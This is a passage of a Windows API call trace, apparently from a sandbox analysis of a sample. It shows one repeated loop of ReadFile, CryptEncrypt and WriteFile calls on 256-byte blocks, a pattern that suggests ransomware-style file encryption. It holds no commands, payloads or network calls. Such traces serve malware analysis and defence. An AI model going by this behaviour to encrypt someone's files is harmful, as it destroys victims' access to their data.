lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.260] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.260] GetLastError () returned 0x0 [0167.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.260] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.260] GetLastError () returned 0x0 [0167.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.260] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.260] GetLastError () returned 0x0 [0167.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.260] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.260] GetLastError () returned 0x0 [0167.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.260] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.260] GetLastError () returned 0x0 [0167.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.260] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.260] GetLastError () returned 0x0 [0167.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.261] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.261] GetLastError () returned 0x0 [0167.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.261] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.261] GetLastError () returned 0x0 [0167.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.261] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.261] GetLastError () returned 0x0 [0167.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.261] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.261] GetLastError () returned 0x0 [0167.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.261] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.261] GetLastError () returned 0x0 [0167.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.261] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.261] GetLastError () returned 0x0 [0167.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.261] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.262] GetLastError () returned 0x0 [0167.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.262] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.262] GetLastError () returned 0x0 [0167.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.262] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.262] GetLastError () returned 0x0 [0167.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.262] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.262] GetLastError () returned 0x0 [0167.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.262] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.262] GetLastError () returned 0x0 [0167.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.262] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.262] GetLastError () returned 0x0 [0167.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.262] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.262] GetLastError () returned 0x0 [0167.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.263] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.263] GetLastError () returned 0x0 [0167.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.263] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.263] GetLastError () returned 0x0 [0167.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.263] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.263] GetLastError () returned 0x0 [0167.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.263] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.263] GetLastError () returned 0x0 [0167.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.263] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.263] GetLastError () returned 0x0 [0167.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.263] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.263] GetLastError () returned 0x0 [0167.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.263] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.264] GetLastError () returned 0x0 [0167.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.264] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.264] GetLastError () returned 0x0 [0167.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.264] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.264] GetLastError () returned 0x0 [0167.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.264] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.264] GetLastError () returned 0x0 [0167.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.264] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.264] GetLastError () returned 0x0 [0167.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.264] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.264] GetLastError () returned 0x0 [0167.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.264] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.264] GetLastError () returned 0x0 [0167.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 